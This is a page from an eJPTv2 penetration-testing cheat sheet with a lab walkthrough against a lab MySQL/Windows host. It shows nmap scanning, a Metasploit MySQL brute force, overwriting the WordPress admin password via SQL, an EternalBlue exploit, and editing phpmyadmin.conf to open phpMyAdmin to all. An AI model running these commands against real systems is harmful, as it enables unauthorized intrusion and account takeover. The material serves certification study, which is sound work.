EJPTV2 Cheat Sheet by - Yash Mehta
  • Information Gathering & Enumeration
    • Reconnaissance
      • Passive information gathering
      • Active information gathering
    • Enumeration
      • SMTP
      • MySQL Enum
        • Metasploit
        • Mysql tool,Brute force
        • Nmap
      • HTTP Enum
        • random tools
        • Nmap
        • Metasploit
      • SSH Enum
        • Nmap,Login,Hydra
        • Metasploit Modules
        • Metasploit Brute force
      • FTP Enum
        • nmap,hydra,Login
        • Metasploit
      • SMB Enum
        • smbmap
        • nmap
        • smbclient,rpcclient,enum4linux
        • metasploit,hydra
      • SMTP Enum
    • Vulnerability Scanning
      • WMAP(web application vulnerability scanner)
      • Nessus
      • Metasploit
  • Vulnerabilities in services
    • IIS WEBDAV
    • SMB/SAMBA
    • RDP
    • WinRm
    • APACHE
    • FTP
    • SSH
    • HTTP
    • SMTP
    • PHP
    • MySQL
    • Sun Glassfish
    • Workflow platform(Processmaker)
  • Exploitation
    • Windows Exploitation
      • IIS WebDav
        • msfvenom,metasploit
      • SMB
        • Brute force and Login
        • Eternal blue vulnerability
      • RDP
        • Bruteforce and Login
        • Bluekeep
      • WinRm
        • Brute force and Authentication
      • HTTP
        • HttpFileServer httpd 2.3(Rejetto)
        • BadBlue httpd 2.7
      • MySQL
      • Workflow platform(Processmaker)
      • Sun GlassFish
      • CVE-2021-44228 - Apache Log4j
      • Apache Tomcat
    • Linux Exploitation
      • Apache httpd 2.4.7-XODA Vulnerability
      • Sun Glassfish
      • Apache-Shellshock(Bash)
        • Metasploit Exploitation
      • FTP
        • Brute Force
        • ProFTPD 1.3.3c
        • vsftpd 2.3.4 - Backdoor Command Execution
      • SSH
        • Brute Force
        • libssh Authentication Bypass Scanner
      • SAMBA
        • Brute Force
        • Samba smbd 3.X - 4.X (Samba 3.5.0 -RCE)
      • SMTP
        • Brute Force
        • Haraka < 2.8.9 - Remote Command Execution
      • PHP
        • PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
      • CVE-2021-44228 - Apache Log4j
    • Payloads
      • Encoding Payloads
      • Injecting Payloads into PEs
  • Post Exploitation
    • Privilege Escalation
      • Windows Privilege Escalation
        • Win Kernel Privesc
        • UAC Bypass Akagai64.exe
        • UAC Bypass:Memory Injection
        • PrivescCheck script
        • Access Token
        • Credentials Dumping
      • Linux Privilege Escalation
        • Cron Jobs
        • SUID
        • chkrootkit 0.49
        • Misconfigured Permissions Files
        • Misconfigured SUDO Privileges
        • Credentials Dumping
    • Hash Dumping
      • Windows hash dumping
        • MimiKatz,Kiwi
        • Pass the hash
      • Linux Hash Dumping
      • Crack the Hash
        • Windows Hash cracking
        • Linux Hash Cracking
        • Metasploit
    • Pivoting
    • Transferring Files
    • Meterpreter
      • Commands
      • Shell to Meterpreter
    • Persistence
      • Windows Persistence
        • persistence_service msf module
        • Enabling RDP(msf,admin password change)
        • Enabling RDP & New user
      • Linux Persistence
        • Adding backdoor user
        • SSHkey persistence module
        • Persistence via SSH Keys
        • Cron Jobs
    • Clearing Tracks
      • Windows clearing tracks
      • Linux clearing tracks
    • Local Enumeration
      • Windows Local Enumeration
      • Linux Local Enumeration
  • Web App Pentesting
Powered by GitBook
On this page
  • Here we are exploiting a MySQL database server and changing credentials of wordpress file and then also gaining access to phpmyadmin page
  • #MySQL
  1. Exploitation
  2. Windows Exploitation

MySQL

Here we are exploiting a MySQL database server and changing credentials of wordpress file and then also gaining access to phpmyadmin page

  • Port scanning with nmap

nmap -sV 10.2.29.246
# Scans 1000 common ports
21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Access the web server with a browser

    • http://10.2.29.246/

    • http://10.2.29.246/hahaha.jpg

    • View page source

  • Other webpages

    • https://10.2.29.246:4848/

    • http://10.2.29.246:8080/

    • http://10.2.29.246:9200/

    • http://10.2.29.246:8484/

    • http://10.2.29.246:8585/

      • http://10.2.29.246:8585/wordpress/

#MySQL

nmap -sV -sC -p 3306,8585 10.2.26.45
3306/tcp open  mysql   MySQL 5.5.20-log
8585/tcp open  http    Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)

  • Search for MySQL exploits

searchsploit MySQL 5.5
# There are only Privilege Escalation exploits

  • Brute-force MySQL

msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'

📌 root password is empty

mysql -u root -p -h 10.2.26.45
show databases;
use wordpress;
show tables;
select * from wp_users;

  • Change admin WordPress user's password

❗ DO NOT Change passwords in a real pentest

UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';

  • Access via browser

    • http://10.2.26.45:8585/wordpress/wp-admin

  • Try to gain access to phpMyAdmin using MSF

    • Access the target through SMB and modify phpMyAdmin configuration file

# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run
sysinfo

  • Move into the wamp folder

cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php

  • Change WordPress admin password

cd C:\\wamp\\alias
download phpmyadmin.conf

# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
	Allow from all

# Write and close
# In the MSFconsole
upload phpmyadmin.conf

# Apache service must be restarted
shell
net stop wampapache
net start wampapache

  • Access phpMyAdmin

    • http://10.2.26.45:8585/phpmyadmin/

    • it automatically logs in since the root password is null

phpMyAdmin

❗ DO NOT Change passwords in a real pentest

PreviousBadBlue httpd 2.7NextWorkflow platform(Processmaker)

Last updated 1 year ago

phpmyadmin.conf